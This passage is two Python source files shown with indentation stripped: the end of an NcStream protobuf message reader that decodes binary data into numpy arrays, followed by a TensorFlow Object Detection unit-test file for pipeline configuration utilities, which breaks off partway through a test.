return np.array(blocks, dtype=dt)
elif data.dataType in _dtype_lookup:
log.debug('Reading array data')
bin_data = read_block(fobj)
log.debug('Binary data: %s', bin_data)
# Hard code to big endian for now since it's not encoded correctly
dt = data_type_to_numpy(data.dataType).newbyteorder('>')
# Handle decompressing the bytes
if data.compress == stream.DEFLATE:
bin_data = zlib.decompress(bin_data)
assert len(bin_data) == data.uncompressedSize
elif data.compress != stream.NONE:
raise NotImplementedError(f'Compression type {data.compress} not implemented!')
# Turn bytes into an array
return reshape_array(data, np.frombuffer(bin_data, dtype=dt))
elif data.dataType == stream.STRUCTURE:
sd = read_proto_object(fobj, stream.StructureData)
# Make a datatype appropriate to the rows of struct
endian = '>' if data.bigend else '<'
dt = np.dtype([(endian, np.void, sd.rowLength)])
# Turn bytes into an array
return reshape_array(data, np.frombuffer(sd.data, dtype=dt))
elif data.dataType == stream.SEQUENCE:
log.debug('Reading sequence')
blocks = []
magic = read_magic(fobj)
while magic != MAGIC_VEND:
if magic == MAGIC_VDATA:
log.error('Bad magic for struct/seq data!')
blocks.append(read_proto_object(fobj, stream.StructureData))
magic = read_magic(fobj)
return data, blocks
else:
raise NotImplementedError(f"Don't know how to handle data type: {data.dataType}")
def read_ncstream_data2(fobj):
"""Handle reading an NcStream v2 data block from a file-like object."""
data = read_proto_object(fobj, stream.DataCol)
return datacol_to_array(data)
def read_ncstream_err(fobj):
"""Handle reading an NcStream error from a file-like object and raise as error."""
err = read_proto_object(fobj, stream.Error)
raise RuntimeError(err.message)
ncstream_table = {MAGIC_HEADER: lambda f: read_proto_object(f, stream.Header),
MAGIC_DATA: read_ncstream_data,
MAGIC_DATA2: read_ncstream_data2,
MAGIC_ERR: read_ncstream_err}
def read_ncstream_messages(fobj):
"""Read a collection of NcStream messages from a file-like object."""
return read_messages(fobj, ncstream_table)
#
# CDMRemoteFeature handling
#
cdmrf_table = {MAGIC_HEADERCOV: lambda f: read_proto_object(f, cdmrf.CoverageDataset),
MAGIC_DATACOV: lambda f: read_proto_object(f, cdmrf.CoverageDataResponse),
MAGIC_DATA2: read_ncstream_data2, # For coordinates
MAGIC_ERR: read_ncstream_err}
def read_cdmrf_messages(fobj):
"""Read a collection of CDMRemoteFeature messages from a file-like object."""
return read_messages(fobj, cdmrf_table)
#
# General Utilities
#
def read_messages(fobj, magic_table):
"""Read messages from a file-like object until stream is exhausted."""
messages = []
while True:
magic = read_magic(fobj)
if not magic:
break
func = magic_table.get(magic)
if func is not None:
messages.append(func(fobj))
else:
log.error('Unknown magic: ' + str(' '.join(f'{b:02x}'
for b in bytearray(magic))))
return messages
def read_proto_object(fobj, klass):
"""Read a block of data and parse using the given protobuf object."""
log.debug('%s chunk', klass.__name__)
obj = klass()
obj.ParseFromString(read_block(fobj))
log.debug('Header: %s', str(obj))
return obj
def read_magic(fobj):
"""Read magic bytes.
Parameters
----------
fobj : file-like object
The file to read from.
Returns
-------
bytes
magic byte sequence read
"""
return fobj.read(4)
def read_block(fobj):
"""Read a block.
Reads a block from a file object by first reading the number of bytes to read, which must
be encoded as a variable-byte length integer.
Parameters
----------
fobj : file-like object
The file to read from.
Returns
-------
bytes
block of bytes read
"""
num = read_var_int(fobj)
log.debug('Next block: %d bytes', num)
return fobj.read(num)
def process_vlen(data_header, array):
"""Process vlen coming back from NCStream v2.
This takes the array of values and slices into an object array, with entries containing
the appropriate pieces of the original array. Sizes are controlled by the passed in
`data_header`.
Parameters
----------
data_header : Header
array : :class:`numpy.ndarray`
Returns
-------
ndarray
object array containing sub-sequences from the original primitive array
"""
source = iter(array)
return np.array([np.fromiter(itertools.islice(source, size), dtype=array.dtype)
for size in data_header.vlens], dtype=object)
def datacol_to_array(datacol):
"""Convert DataCol from NCStream v2 into an array with appropriate type.
Depending on the data type specified, this extracts data from the appropriate members
and packs into a :class:`numpy.ndarray`, recursing as necessary for compound data types.
Parameters
----------
datacol : DataCol
Returns
-------
ndarray
array containing extracted data
"""
if datacol.dataType == stream.STRING:
arr = np.array(datacol.stringdata, dtype=object)
elif datacol.dataType == stream.OPAQUE:
arr = np.array(datacol.opaquedata, dtype=object)
elif datacol.dataType == stream.STRUCTURE:
members = OrderedDict((mem.name, datacol_to_array(mem))
for mem in datacol.structdata.memberData)
log.debug('Struct members:\n%s', str(members))
# str() around name necessary because protobuf gives unicode names, but dtype doesn't
# support them on Python 2
dt = np.dtype([(str(name), arr.dtype) for name, arr in members.items()])
log.debug('Struct dtype: %s', str(dt))
arr = np.empty((datacol.nelems,), dtype=dt)
for name, arr_data in members.items():
arr[name] = arr_data
else:
# Make an appropriate datatype
endian = '>' if datacol.bigend else '<'
dt = data_type_to_numpy(datacol.dataType).newbyteorder(endian)
# Turn bytes into an array
arr = np.frombuffer(datacol.primdata, dtype=dt)
if arr.size != datacol.nelems:
log.warning('Array size %d does not agree with nelems %d',
arr.size, datacol.nelems)
if datacol.isVlen:
arr = process_vlen(datacol, arr)
try:
arr = reshape_array(datacol, arr)
except ValueError:
# In this case, the array collapsed, need different resize that
# correctly sizes from elements
shape = tuple(r.size for r in datacol.section.range) + (datacol.vlens[0],)
arr = arr.reshape(*shape)
else:
arr = reshape_array(datacol, arr)
return arr
def reshape_array(data_header, array):
"""Extract the appropriate array shape from the header.
Can handle taking a data header and either bytes containing data or a StructureData
instance, which will have binary data as well as some additional information.
Parameters
----------
array : :class:`numpy.ndarray`
data_header : Data
"""
shape = tuple(r.size for r in data_header.section.range)
if shape:
return array.reshape(*shape)
else:
return array
# STRUCTURE = 8;
# SEQUENCE = 9;
_dtype_lookup = {stream.CHAR: 'S1', stream.BYTE: 'b', stream.SHORT: 'i2',
stream.INT: 'i4', stream.LONG: 'i8', stream.FLOAT: 'f4',
stream.DOUBLE: 'f8', stream.STRING: 'O',
stream.ENUM1: 'B', stream.ENUM2: 'u2', stream.ENUM4: 'u4',
stream.OPAQUE: 'O', stream.UBYTE: 'B', stream.USHORT: 'u2',
stream.UINT: 'u4', stream.ULONG: 'u8'}
def data_type_to_numpy(datatype, unsigned=False):
"""Convert an ncstream datatype to a numpy one."""
basic_type = _dtype_lookup[datatype]
if datatype in (stream.STRING, stream.OPAQUE):
return np.dtype(basic_type)
if unsigned:
basic_type = basic_type.replace('i', 'u')
return np.dtype('=' + basic_type)
def struct_to_dtype(struct):
"""Convert a Structure specification to a numpy structured dtype."""
# str() around name necessary because protobuf gives unicode names, but dtype doesn't
# support them on Python 2
fields = [(str(var.name), data_type_to_numpy(var.dataType, var.unsigned))
for var in struct.vars]
for s in struct.structs:
fields.append((str(s.name), struct_to_dtype(s)))
log.debug('Structure fields: %s', fields)
dt = np.dtype(fields)
return dt
def unpack_variable(var):
"""Unpack an NCStream Variable into information we can use."""
# If we actually get a structure instance, handle turning that into a variable
if var.dataType == stream.STRUCTURE:
return None, struct_to_dtype(var), 'Structure'
elif var.dataType == stream.SEQUENCE:
log.warning('Sequence support not implemented!')
dt = data_type_to_numpy(var.dataType, var.unsigned)
if var.dataType == stream.OPAQUE:
type_name = 'opaque'
elif var.dataType == stream.STRING:
type_name = 'string'
else:
type_name = dt.name
if var.data:
log.debug('Storing variable data: %s %s', dt, var.data)
if var.dataType == stream.STRING:
data = var.data
else:
# Always sent big endian
data = np.frombuffer(var.data, dtype=dt.newbyteorder('>'))
else:
data = None
return data, dt, type_name
_attr_converters = {stream.Attribute.BYTE: np.dtype('>b'),
stream.Attribute.SHORT: np.dtype('>i2'),
stream.Attribute.INT: np.dtype('>i4'),
stream.Attribute.LONG: np.dtype('>i8'),
stream.Attribute.FLOAT: np.dtype('>f4'),
stream.Attribute.DOUBLE: np.dtype('>f8')}
def unpack_attribute(att):
"""Unpack an embedded attribute into a python or numpy object."""
if att.unsigned:
log.warning('Unsupported unsigned attribute!')
# TDS 5.0 now has a dataType attribute that takes precedence
if att.len == 0: # Empty
val = None
elif att.dataType == stream.STRING: # Then look for new datatype string
val = att.sdata
elif att.dataType: # Then a non-zero new data type
val = np.frombuffer(att.data,
dtype='>' + _dtype_lookup[att.dataType], count=att.len)
elif att.type: # Then non-zero old-data type0
val = np.frombuffer(att.data,
dtype=_attr_converters[att.type], count=att.len)
elif att.sdata: # This leaves both 0, try old string
val = att.sdata
else: # Assume new datatype is Char (0)
val = np.array(att.data, dtype=_dtype_lookup[att.dataType])
if att.len == 1:
val = val[0]
return att.name, val
def read_var_int(file_obj):
"""Read a variable-length integer.
Parameters
----------
file_obj : file-like object
The file to read from.
Returns
-------
int
the variable-length value read
"""
# Read all bytes from here, stopping with the first one that does not have
# the MSB set. Save the lower 7 bits, and keep stacking to the *left*.
val = 0
shift = 0
while True:
# Read next byte
next_val = ord(file_obj.read(1))
val |= ((next_val & 0x7F) << shift)
shift += 7
if not next_val & 0x80:
break
return val
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.utils.config_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import range
import tensorflow as tf
from google.protobuf import text_format
from object_detection.protos import eval_pb2
from object_detection.protos import image_resizer_pb2
from object_detection.protos import input_reader_pb2
from object_detection.protos import model_pb2
from object_detection.protos import pipeline_pb2
from object_detection.protos import train_pb2
from object_detection.utils import config_util
def _write_config(config, config_path):
"""Writes a config object to disk."""
config_text = text_format.MessageToString(config)
with tf.gfile.Open(config_path, "wb") as f:
f.write(config_text)
def _update_optimizer_with_constant_learning_rate(optimizer, learning_rate):
"""Adds a new constant learning rate."""
constant_lr = optimizer.learning_rate.constant_learning_rate
constant_lr.learning_rate = learning_rate
def _update_optimizer_with_exponential_decay_learning_rate(
optimizer, learning_rate):
"""Adds a new exponential decay learning rate."""
exponential_lr = optimizer.learning_rate.exponential_decay_learning_rate
exponential_lr.initial_learning_rate = learning_rate
def _update_optimizer_with_manual_step_learning_rate(
optimizer, initial_learning_rate, learning_rate_scaling):
"""Adds a learning rate schedule."""
manual_lr = optimizer.learning_rate.manual_step_learning_rate
manual_lr.initial_learning_rate = initial_learning_rate
for i in range(3):
schedule = manual_lr.schedule.add()
schedule.learning_rate = initial_learning_rate * learning_rate_scaling**i
def _update_optimizer_with_cosine_decay_learning_rate(
optimizer, learning_rate, warmup_learning_rate):
"""Adds a new cosine decay learning rate."""
cosine_lr = optimizer.learning_rate.cosine_decay_learning_rate
cosine_lr.learning_rate_base = learning_rate
cosine_lr.warmup_learning_rate = warmup_learning_rate
class ConfigUtilTest(tf.test.TestCase):
def _create_and_load_test_configs(self, pipeline_config):
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
_write_config(pipeline_config, pipeline_config_path)
return config_util.get_configs_from_pipeline_file(pipeline_config_path)
def test_get_configs_from_pipeline_file(self):
"""Test that proto configs can be read from pipeline config file."""
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.faster_rcnn.num_classes = 10
pipeline_config.train_config.batch_size = 32
pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
pipeline_config.eval_config.num_examples = 20
pipeline_config.eval_input_reader.add().queue_capacity = 100
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
self.assertProtoEquals(pipeline_config.model, configs["model"])
self.assertProtoEquals(pipeline_config.train_config,
configs["train_config"])
self.assertProtoEquals(pipeline_config.train_input_reader,
configs["train_input_config"])
self.assertProtoEquals(pipeline_config.eval_config,
configs["eval_config"])
self.assertProtoEquals(pipeline_config.eval_input_reader,
configs["eval_input_configs"])
def test_create_configs_from_pipeline_proto(self):
"""Tests creating configs dictionary from pipeline proto."""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.faster_rcnn.num_classes = 10
pipeline_config.train_config.batch_size = 32
pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
pipeline_config.eval_config.num_examples = 20
pipeline_config.eval_input_reader.add().queue_capacity = 100
configs = config_util.create_configs_from_pipeline_proto(pipeline_config)
self.assertProtoEquals(pipeline_config.model, configs["model"])
self.assertProtoEquals(pipeline_config.train_config,
configs["train_config"])
self.assertProtoEquals(pipeline_config.train_input_reader,
configs["train_input_config"])
self.assertProtoEquals(pipeline_config.eval_config, configs["eval_config"])
self.assertProtoEquals(pipeline_config.eval_input_reader,
configs["eval_input_configs"])
def test_create_pipeline_proto_from_configs(self):
"""Tests that proto can be reconstructed from configs dictionary."""
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.faster_rcnn.num_classes = 10
pipeline_config.train_config.batch_size = 32
pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
pipeline_config.eval_config.num_examples = 20
pipeline_config.eval_input_reader.add().queue_capacity = 100
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
pipeline_config_reconstructed = (
config_util.create_pipeline_proto_from_configs(configs))
self.assertEqual(pipeline_config, pipeline_config_reconstructed)
def test_save_pipeline_config(self):
"""Tests that the pipeline config is properly saved to disk."""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.faster_rcnn.num_classes = 10
pipeline_config.train_config.batch_size = 32
pipeline_config.train_input_reader.label_map_path = "path/to/label_map"
pipeline_config.eval_config.num_examples = 20
pipeline_config.eval_input_reader.add().queue_capacity = 100
config_util.save_pipeline_config(pipeline_config, self.get_temp_dir())
configs = config_util.get_configs_from_pipeline_file(
os.path.join(self.get_temp_dir(), "pipeline.config"))
pipeline_config_reconstructed = (
config_util.create_pipeline_proto_from_configs(configs))
self.assertEqual(pipeline_config, pipeline_config_reconstructed)
def test_get_configs_from_multiple_files(self):
"""Tests that proto configs can be read from multiple files."""
temp_dir = self.get_temp_dir()
# Write model config file.
model_config_path = os.path.join(temp_dir, "model.config")
model = model_pb2.DetectionModel()
model.faster_rcnn.num_classes = 10
_write_config(model, model_config_path)
# Write train config file.
train_config_path = os.path.join(temp_dir, "train.config")
train_config = train_config = train_pb2.TrainConfig()
train_config.batch_size = 32
_write_config(train_config, train_config_path)
# Write train input config file.
train_input_config_path = os.path.join(temp_dir, "train_input.config")
train_input_config = input_reader_pb2.InputReader()
train_input_config.label_map_path = "path/to/label_map"
_write_config(train_input_config, train_input_config_path)
# Write eval config file.
eval_config_path = os.path.join(temp_dir, "eval.config")
eval_config = eval_pb2.EvalConfig()
eval_config.num_examples = 20
_write_config(eval_config, eval_config_path)
# Write eval input config file.
eval_input_config_path = os.path.join(temp_dir, "eval_input.config")
eval_input_config = input_reader_pb2.InputReader()
eval_input_config.label_map_path = "path/to/another/label_map"
_write_config(eval_input_config, eval_input_config_path)
configs = config_util.get_configs_from_multiple_files(
model_config_path=model_config_path,
train_config_path=train_config_path,
train_input_config_path=train_input_config_path,
eval_config_path=eval_config_path,
eval_input_config_path=eval_input_config_path)
self.assertProtoEquals(model, configs["model"])
self.assertProtoEquals(train_config, configs["train_config"])
self.assertProtoEquals(train_input_config,
configs["train_input_config"])
self.assertProtoEquals(eval_config, configs["eval_config"])
self.assertProtoEquals(eval_input_config, configs["eval_input_configs"][0])
def _assertOptimizerWithNewLearningRate(self, optimizer_name):
"""Asserts successful updating of all learning rate schemes."""
original_learning_rate = 0.7
learning_rate_scaling = 0.1
warmup_learning_rate = 0.07
hparams = tf.contrib.training.HParams(learning_rate=0.15)
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
# Constant learning rate.
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
_update_optimizer_with_constant_learning_rate(optimizer,
original_learning_rate)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
optimizer = getattr(configs["train_config"].optimizer, optimizer_name)
constant_lr = optimizer.learning_rate.constant_learning_rate
self.assertAlmostEqual(hparams.learning_rate, constant_lr.learning_rate)
# Exponential decay learning rate.
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
_update_optimizer_with_exponential_decay_learning_rate(
optimizer, original_learning_rate)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
optimizer = getattr(configs["train_config"].optimizer, optimizer_name)
exponential_lr = optimizer.learning_rate.exponential_decay_learning_rate
self.assertAlmostEqual(hparams.learning_rate,
exponential_lr.initial_learning_rate)
# Manual step learning rate.
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
_update_optimizer_with_manual_step_learning_rate(
optimizer, original_learning_rate, learning_rate_scaling)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
optimizer = getattr(configs["train_config"].optimizer, optimizer_name)
manual_lr = optimizer.learning_rate.manual_step_learning_rate
self.assertAlmostEqual(hparams.learning_rate,
manual_lr.initial_learning_rate)
for i, schedule in enumerate(manual_lr.schedule):
self.assertAlmostEqual(hparams.learning_rate * learning_rate_scaling**i,
schedule.learning_rate)
# Cosine decay learning rate.
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
optimizer = getattr(pipeline_config.train_config.optimizer, optimizer_name)
_update_optimizer_with_cosine_decay_learning_rate(optimizer,
original_learning_rate,
warmup_learning_rate)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
optimizer = getattr(configs["train_config"].optimizer, optimizer_name)
cosine_lr = optimizer.learning_rate.cosine_decay_learning_rate
self.assertAlmostEqual(hparams.learning_rate, cosine_lr.learning_rate_base)
warmup_scale_factor = warmup_learning_rate / original_learning_rate
self.assertAlmostEqual(hparams.learning_rate * warmup_scale_factor,
cosine_lr.warmup_learning_rate)
def testRMSPropWithNewLearingRate(self):
"""Tests new learning rates for RMSProp Optimizer."""
self._assertOptimizerWithNewLearningRate("rms_prop_optimizer")
def testMomentumOptimizerWithNewLearningRate(self):
"""Tests new learning rates for Momentum Optimizer."""
self._assertOptimizerWithNewLearningRate("momentum_optimizer")
def testAdamOptimizerWithNewLearningRate(self):
"""Tests new learning rates for Adam Optimizer."""
self._assertOptimizerWithNewLearningRate("adam_optimizer")
def testGenericConfigOverride(self):
"""Tests generic config overrides for all top-level configs."""
# Set one parameter for each of the top-level pipeline configs:
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.ssd.num_classes = 1
pipeline_config.train_config.batch_size = 1
pipeline_config.eval_config.num_visualizations = 1
pipeline_config.train_input_reader.label_map_path = "/some/path"
pipeline_config.eval_input_reader.add().label_map_path = "/some/path"
pipeline_config.graph_rewriter.quantization.weight_bits = 1
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
_write_config(pipeline_config, pipeline_config_path)
# Override each of the parameters:
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
hparams = tf.contrib.training.HParams(
**{
"model.ssd.num_classes": 2,
"train_config.batch_size": 2,
"train_input_config.label_map_path": "/some/other/path",
"eval_config.num_visualizations": 2,
"graph_rewriter_config.quantization.weight_bits": 2
})
configs = config_util.merge_external_params_with_configs(configs, hparams)
# Ensure that the parameters have the overridden values:
self.assertEqual(2, configs["model"].ssd.num_classes)
self.assertEqual(2, configs["train_config"].batch_size)
self.assertEqual("/some/other/path",
configs["train_input_config"].label_map_path)
self.assertEqual(2, configs["eval_config"].num_visualizations)
self.assertEqual(2,
configs["graph_rewriter_config"].quantization.weight_bits)
def testNewBatchSize(self):
"""Tests that batch size is updated appropriately."""
original_batch_size = 2
hparams = tf.contrib.training.HParams(batch_size=16)
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_config.batch_size = original_batch_size
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
new_batch_size = configs["train_config"].batch_size
self.assertEqual(16, new_batch_size)
def testNewBatchSizeWithClipping(self):
"""Tests that batch size is clipped to 1 from below."""
original_batch_size = 2
hparams = tf.contrib.training.HParams(batch_size=0.5)
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_config.batch_size = original_batch_size
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
new_batch_size = configs["train_config"].batch_size
self.assertEqual(1, new_batch_size) # Clipped to 1.0.
def testOverwriteBatchSizeWithKeyValue(self):
"""Tests that batch size is overwritten based on key/value."""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_config.batch_size = 2
configs = self._create_and_load_test_configs(pipeline_config)
hparams = tf.contrib.training.HParams(**{"train_config.batch_size": 10})
configs = config_util.merge_external_params_with_configs(configs, hparams)
new_batch_size = configs["train_config"].batch_size
self.assertEqual(10, new_batch_size)
def testKeyValueOverrideBadKey(self):
"""Tests that overwriting with a bad key causes an exception."""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
configs = self._create_and_load_test_configs(pipeline_config)
hparams = tf.contrib.training.HParams(**{"train_config.no_such_field": 10})
with self.assertRaises(ValueError):
config_util.merge_external_params_with_configs(configs, hparams)
def testOverwriteBatchSizeWithBadValueType(self):
"""Tests that overwriting with a bad valuye type causes an exception."""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_config.batch_size = 2
configs = self._create_and_load_test_configs(pipeline_config)
# Type should be an integer, but we're passing a string "10".
hparams = tf.contrib.training.HParams(**{"train_config.batch_size": "10"})
with self.assertRaises(TypeError):
config_util.merge_external_params_with_configs(configs, hparams)
def testNewMomentumOptimizerValue(self):
"""Tests that new momentum value is updated appropriately."""
original_momentum_value = 0.4
hparams = tf.contrib.training.HParams(momentum_optimizer_value=1.1)
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
optimizer_config = pipeline_config.train_config.optimizer.rms_prop_optimizer
optimizer_config.momentum_optimizer_value = original_momentum_value
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
optimizer_config = configs["train_config"].optimizer.rms_prop_optimizer
new_momentum_value = optimizer_config.momentum_optimizer_value
self.assertAlmostEqual(1.0, new_momentum_value) # Clipped to 1.0.
def testNewClassificationLocalizationWeightRatio(self):
"""Tests that the loss weight ratio is updated appropriately."""
original_localization_weight = 0.1
original_classification_weight = 0.2
new_weight_ratio = 5.0
hparams = tf.contrib.training.HParams(
classification_localization_weight_ratio=new_weight_ratio)
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.ssd.loss.localization_weight = (
original_localization_weight)
pipeline_config.model.ssd.loss.classification_weight = (
original_classification_weight)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
loss = configs["model"].ssd.loss
self.assertAlmostEqual(1.0, loss.localization_weight)
self.assertAlmostEqual(new_weight_ratio, loss.classification_weight)
def testNewFocalLossParameters(self):
"""Tests that the loss weight ratio is updated appropriately."""
original_alpha = 1.0
original_gamma = 1.0
new_alpha = 0.3
new_gamma = 2.0
hparams = tf.contrib.training.HParams(
focal_loss_alpha=new_alpha, focal_loss_gamma=new_gamma)
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
classification_loss = pipeline_config.model.ssd.loss.classification_loss
classification_loss.weighted_sigmoid_focal.alpha = original_alpha
classification_loss.weighted_sigmoid_focal.gamma = original_gamma
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
configs = config_util.merge_external_params_with_configs(configs, hparams)
classification_loss = configs["model"].ssd.loss.classification_loss
self.assertAlmostEqual(new_alpha,
classification_loss.weighted_sigmoid_focal.alpha)
self.assertAlmostEqual(new_gamma,
classification_loss.weighted_sigmoid_focal.gamma)
def testMergingKeywordArguments(self):
"""Tests that keyword arguments get merged as do hyperparameters."""
original_num_train_steps = 100
desired_num_train_steps = 10
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_config.num_steps = original_num_train_steps
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"train_steps": desired_num_train_steps}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
train_steps = configs["train_config"].num_steps
self.assertEqual(desired_num_train_steps, train_steps)
def testGetNumberOfClasses(self):
"""Tests that number of classes can be retrieved."""
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.faster_rcnn.num_classes = 20
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
number_of_classes = config_util.get_number_of_classes(configs["model"])
self.assertEqual(20, number_of_classes)
def testNewTrainInputPath(self):
"""Tests that train input path can be overwritten with single file."""
original_train_path = ["path/to/data"]
new_train_path = "another/path/to/data"
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
reader_config = pipeline_config.train_input_reader.tf_record_input_reader
reader_config.input_path.extend(original_train_path)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"train_input_path": new_train_path}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
reader_config = configs["train_input_config"].tf_record_input_reader
final_path = reader_config.input_path
self.assertEqual([new_train_path], final_path)
def testNewTrainInputPathList(self):
"""Tests that train input path can be overwritten with multiple files."""
original_train_path = ["path/to/data"]
new_train_path = ["another/path/to/data", "yet/another/path/to/data"]
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
reader_config = pipeline_config.train_input_reader.tf_record_input_reader
reader_config.input_path.extend(original_train_path)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"train_input_path": new_train_path}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
reader_config = configs["train_input_config"].tf_record_input_reader
final_path = reader_config.input_path
self.assertEqual(new_train_path, final_path)
def testNewLabelMapPath(self):
"""Tests that label map path can be overwritten in input readers."""
original_label_map_path = "path/to/original/label_map"
new_label_map_path = "path//to/new/label_map"
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
train_input_reader = pipeline_config.train_input_reader
train_input_reader.label_map_path = original_label_map_path
eval_input_reader = pipeline_config.eval_input_reader.add()
eval_input_reader.label_map_path = original_label_map_path
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"label_map_path": new_label_map_path}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
self.assertEqual(new_label_map_path,
configs["train_input_config"].label_map_path)
for eval_input_config in configs["eval_input_configs"]:
self.assertEqual(new_label_map_path, eval_input_config.label_map_path)
def testDontOverwriteEmptyLabelMapPath(self):
"""Tests that label map path will not by overwritten with empty string."""
original_label_map_path = "path/to/original/label_map"
new_label_map_path = ""
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
train_input_reader = pipeline_config.train_input_reader
train_input_reader.label_map_path = original_label_map_path
eval_input_reader = pipeline_config.eval_input_reader.add()
eval_input_reader.label_map_path = original_label_map_path
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"label_map_path": new_label_map_path}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
self.assertEqual(original_label_map_path,
configs["train_input_config"].label_map_path)
self.assertEqual(original_label_map_path,
configs["eval_input_configs"][0].label_map_path)
def testNewMaskType(self):
"""Tests that mask type can be overwritten in input readers."""
original_mask_type = input_reader_pb2.NUMERICAL_MASKS
new_mask_type = input_reader_pb2.PNG_MASKS
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
train_input_reader = pipeline_config.train_input_reader
train_input_reader.mask_type = original_mask_type
eval_input_reader = pipeline_config.eval_input_reader.add()
eval_input_reader.mask_type = original_mask_type
